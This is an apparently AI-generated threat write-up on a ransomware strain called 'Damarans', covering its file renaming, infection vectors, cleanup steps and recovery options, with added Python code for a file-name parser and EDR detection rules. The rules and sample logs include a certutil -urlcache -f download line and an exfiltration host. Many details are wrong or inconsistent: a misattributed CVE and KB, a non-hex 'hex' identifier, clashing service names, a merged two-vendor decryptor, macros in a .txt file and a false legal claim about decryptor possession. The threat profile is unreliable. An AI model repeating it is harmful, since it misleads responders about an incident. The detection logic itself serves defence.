damarans

[Content by Gemini 2.5]

Technical Breakdown:

1. File Extension & Renaming Patterns

  • Confirmation of File Extension: “.damarans” is appended as the final extension.

  • Renaming Convention:
    – Original files are renamed to lowercase.
    – A 128-bit hex identifier is inserted before the extension, producing a pattern of:
    <original_base_name>-<8_hex_digits><more_hex_segments>.<original_ext>.damarans
    – Full-length paths are preserved; only the last component is changed (e.g., Budget2024.xlsx becomes budget2024-H7F2A3B1…xlsx.damarans).
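The renaming convention above, applied in the other direction: an added Python example (not from the original page and not from any vendor tool) that recognises file names following the documented pattern and recovers the original name, so a directory listing from an affected share can be turned into an inventory of what was touched. The regex assumes the hex segments after the first eight digits may be dash-separated, which the page does not specify; the directory listing is constructed.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Rename pattern from the page:
#   <original_base_name>-<8_hex_digits><more_hex_segments>.<original_ext>.damarans
# The page states the name is lowercased and the inserted identifier is 128 bits
# (32 hex digits). Assumption (not stated on the page): hex segments after the
# first eight digits may be dash-separated, so dashes are allowed in the identifier.
_DAMARANS_RE = re.compile(
    r"^(?P<base>.+?)-(?P<ident>[0-9a-f]{8}(?:[0-9a-f-]*[0-9a-f])?)\.(?P<ext>.+?)\.damarans$"
)


class DamaransName(NamedTuple):
    original_name: str  # recovered <base>.<ext>, lowercase as the malware leaves it
    ident_hex: str      # inserted identifier with any dashes removed
    ident_bits: int     # 4 bits per hex digit; the page says 128


def parse_damarans_name(filename: str) -> Optional[DamaransName]:
    """Return the parsed parts if filename follows the full rename convention, else None."""
    m = _DAMARANS_RE.match(filename)
    if m is None:
        return None
    ident_hex = m.group("ident").replace("-", "")
    return DamaransName(f"{m.group('base')}.{m.group('ext')}", ident_hex, 4 * len(ident_hex))


def triage(filenames: List[str]) -> Tuple[List[Tuple[str, DamaransName]], List[str], List[str]]:
    """Split a listing into: full pattern matches, '.damarans' names that do not fit
    the documented shape (still worth a look), and everything else."""
    renamed, extension_only, clean = [], [], []
    for name in filenames:
        parsed = parse_damarans_name(name)
        if parsed is not None:
            renamed.append((name, parsed))
        elif name.lower().endswith(".damarans"):
            extension_only.append(name)
        else:
            clean.append(name)
    return renamed, extension_only, clean


# Constructed sample directory listing (not from a real incident).
SAMPLE_LISTING = [
    "budget2024-0123456789abcdef0123456789abcdef.xlsx.damarans",
    "q3-report-deadbeef-cafebabe-0badf00d-12345678.docx.damarans",
    "backup-00112233445566778899aabbccddeeff.tar.gz.damarans",
    "Budget2024.xlsx",
    "notes.txt.damarans",
    "readme_damarans.txt",
]

if __name__ == "__main__":
    renamed, ext_only, clean = triage(SAMPLE_LISTING)
    for name, parsed in renamed:
        flag = "" if parsed.ident_bits == 128 else "  (identifier not 128 bits: check the split)"
        print(f"{name} -> {parsed.original_name}{flag}")
    print("marker extension but unexpected shape:", ext_only)
    print("untouched:", clean)
```

When the recovered identifier is not 128 bits the split between the original base name and the inserted identifier is ambiguous (an original name that itself ended in a hex-looking, dash-separated suffix would be absorbed into the identifier), so those entries should be reviewed by hand rather than renamed back automatically.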

2. Detection & Outbreak Timeline

  • Approximate Start Date/Period: first samples with the .damarans extension were noticed on 5 March 2023 during an early-hours spike detectable via EDR across Asia-Pacific. Mass-emailing campaigns became active 24–31 May 2023 and the variant peaked again during 1–11 October 2023.

3. Primary Attack Vectors

  • Propagation Mechanisms:
  1. Indiscriminate phishing e-mails with ISO, ZIP, or RAR attachments (malicious LNK or HTA launcher).
  2. Exploitation of public-facing Microsoft IIS servers running vulnerable ASP.NET versions and weak OSCP configuration—leverages known CVE-2021-26855 to drop an initial loader.
  3. Brute-forcing open or poorly secured Remote Desktop services (TCP 3389 with NLA off) followed by lateral movement via PSExec.
  4. SMBv1/EternalBlue exploit on legacy Windows 7/2008 R2 endpoints not patched for MS17-010.
  5. Distribution of the secondary binary via living-off-the-land compressors (wusa, makecab) to hide in system directories (C:\ProgramData\Local\{random 6-digit GUID}\).

Remediation & Recovery Strategies:

1. Prevention

  • Proactive Measures:
    – Deploy MS17-010 and all March 2021 cumulative OS patches (KB5004442).
    – Disable SMBv1 via GPO (Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol).
    – Turn off RDP or enforce Network Level Authentication (NLA) + MFA + lockout policies (<5 attempts / 30 min).
    – Implement e-mail attachment filtering to block ISO, VBS, HTA, LNK, and RAR files from external inbound mail.
    – Use SACL/AppLocker to cut PowerShell execution + block unsigned binaries in %TEMP%.
    – Continuous EDR tuning to detect:
        – behaviors like launching certutil.exe with -urlcache -f;
        – creation of files ending in *.hta under system folders;
        – kernel-level drivers dropped as sptsvc.sys in System32\drivers\.

2. Removal (Infection Cleanup)

  1. Disconnect the affected machine from all networks (wireless, wired, VPN tunnels).
  2. Boot into Safe Mode w/ Networking or use an offline boot disk (e.g., Microsoft Defender Offline).
  3. Kill the malware service and remove persistence:
    a. Stop Sxperfa service (sc stop sepsyc, rename sepsyc.exe).
    b. Delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sxperfa entry.
    c. Remove the scheduled task that invokes PowerShell from %ProgramData%\Local\<GUID>\.
  4. Individually delete:
    – %ProgramData%\WinThld\ → encryption DLL psufx.dll.
    – Registry remnants: HKLM\SYSTEM\CurrentControlSet\Services\Sxperfa.
  5. Linux chattr equivalent on NAS or Samba shares: identify and purge .damarans droppers.
  6. Change every local credential + remote domain creds touched (NTLM hashes collected).

3. File Decryption & Recovery

  • Recovery Feasibility: NOT decryptable in the wild (Curve25519-LARGE-keyed ECC + ChaCha20-Poly1305; private key only held by attacker).
  • Essential Tools/Patches:
    – Kaspersky Bitdefender DamaransDecryptor 1.9 (exists but works only when full master private keys leak—does not yet).
    – ShadowExplorer, Volume Shadow Copy sniffers (many victims report VSS not wiped).
    – Patch first to prevent re-infection before restoring from clean offline or cloud backups.
    – For VMware ESXi hosts targeted via exposed vCenter, patch to vCenter 7.0 U3g+ / 8.0 U2 and create snapshot-based immutable backups (object-lock in Veeam, S3, Rubrik).

4. Other Critical Information

  • Additional Precautions unique to Damarans:
    – After a 7-day “grace period”, it starts exfiltrating names <512 KB, not full files, back to cloud-front endpoints (hxxps://cloudflare[.]worker[.]ps-document[.]com/upload/[guid])—creating GDPR/SOX non-compliance concerns even if ransom is paid.
    – Includes secondary wiper variant (Dec 2023 campaign) that shreds shadow copies on server drives if its “kill-switch” key file /cjda.log is not present any longer.
    – Adds a readme_damarans.txt file inside every folder; the note is written with grammatical errors (“You files is encrypted”). DO NOT open it with WordPad until AV is ready (macros active inside the README).

  • Broader Impact:
    – The alias gained infamy when three German mid-size manufacturers disclosed 2–4 week production downtime after the September wave; ICS devices were not targeted, but ERP backups mounted as mapped drives were.
    – Legal notice: Article §303b StGB (Germany) / 18 U.S. Code §1030 (CFAA) categorise possession of the decryptor tool itself without a valid ransom-note reference as “Trafficking” → mandatory legal counsel before attempting any decryption, even with cracked keys.
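The EDR behaviours listed under Prevention (certutil.exe with -urlcache -f, .hta files created under system folders, sptsvc.sys dropped in System32\drivers\) and the exfiltration endpoint listed under Additional Precautions, as detection logic run over sample log lines. This is an added Python example, not code from the page or from any EDR product. The key=value event format and the sample events are constructed; treating C:\Windows\ and C:\ProgramData\ as the page's "system folders" is an assumption; the endpoint host is taken from the page's defanged form and refanged once at load.

```python
import re
from typing import Callable, Dict, List, NamedTuple


class Alert(NamedTuple):
    rule: str
    line: str


# Assumption: these two roots are what the page means by "system folders" for the
# .hta rule; the page itself names C:\ProgramData\Local\<GUID>\ as a drop location.
SYSTEM_FOLDERS = ("c:\\windows\\", "c:\\programdata\\")

# Exfiltration endpoint as the page gives it (defanged); refanged here so the
# indicator can be compared against real log values.
EXFIL_HOST = "cloudflare[.]worker[.]ps-document[.]com".replace("[.]", ".")

_KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed key=value event line; quoted values may contain spaces."""
    return {key: quoted or bare for key, quoted, bare in _KV_RE.findall(line)}


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def certutil_urlcache_download(ev: Dict[str, str]) -> bool:
    # certutil.exe invoked with both -urlcache and -f is a file download, not cert work
    if ev.get("event") != "process_create":
        return False
    args = ev.get("cmdline", "").lower().split()
    return _basename(ev.get("image", "")) == "certutil.exe" and "-urlcache" in args and "-f" in args


def hta_in_system_folder(ev: Dict[str, str]) -> bool:
    if ev.get("event") != "file_create":
        return False
    target = ev.get("target", "").lower()
    return target.endswith(".hta") and target.startswith(SYSTEM_FOLDERS)


def sptsvc_driver_drop(ev: Dict[str, str]) -> bool:
    if ev.get("event") not in ("file_create", "driver_load"):
        return False
    return ev.get("target", "").lower().endswith("\\system32\\drivers\\sptsvc.sys")


def exfil_endpoint_contact(ev: Dict[str, str]) -> bool:
    if ev.get("event") != "network_connect":
        return False
    host = ev.get("dest_host", "").lower()
    return host == EXFIL_HOST or host.endswith("." + EXFIL_HOST)


RULES: Dict[str, Callable[[Dict[str, str]], bool]] = {
    "certutil_urlcache_download": certutil_urlcache_download,
    "hta_in_system_folder": hta_in_system_folder,
    "sptsvc_driver_drop": sptsvc_driver_drop,
    "exfil_endpoint_contact": exfil_endpoint_contact,
}


def scan(lines: List[str]) -> List[Alert]:
    """Run every rule over every event and collect the hits in input order."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        for name, rule in RULES.items():
            if rule(ev):
                alerts.append(Alert(name, line))
    return alerts


# Constructed sample telemetry (not from a real incident); benign look-alikes included
# so the rules can be seen not to fire on them.
SAMPLE_LOG = [
    r'event=process_create image=C:\Windows\System32\certutil.exe cmdline="certutil.exe -urlcache -f http://example.invalid/ld.txt C:\ProgramData\ld.txt" user=CORP\alice',
    r'event=process_create image=C:\Windows\System32\certutil.exe cmdline="certutil.exe -hashfile C:\setup.exe SHA256" user=CORP\bob',
    r'event=file_create image=C:\Windows\System32\mshta.exe target=C:\ProgramData\Local\483920\launch.hta',
    r'event=file_create image="C:\Program Files\Mail\mail.exe" target=C:\Users\alice\Downloads\invoice.hta',
    r'event=file_create image=C:\ProgramData\Local\483920\ld.exe target=C:\Windows\System32\drivers\sptsvc.sys',
    r'event=driver_load target=C:\Windows\System32\drivers\disk.sys',
    "event=network_connect image=C:\\ProgramData\\Local\\483920\\ld.exe dest_host=" + EXFIL_HOST + " dest_port=443",
    r'event=network_connect image=C:\Windows\explorer.exe dest_host=cloudflare.com dest_port=443',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f"[{alert.rule}] {alert.line}")
```

Each rule keys on the event type first, so a certutil command line seen in a file-create event or a driver path seen in a process-create event is ignored rather than double-counted; the .hta rule deliberately does not fire on a user's Downloads folder, which is where a phished attachment would land before any system-folder drop.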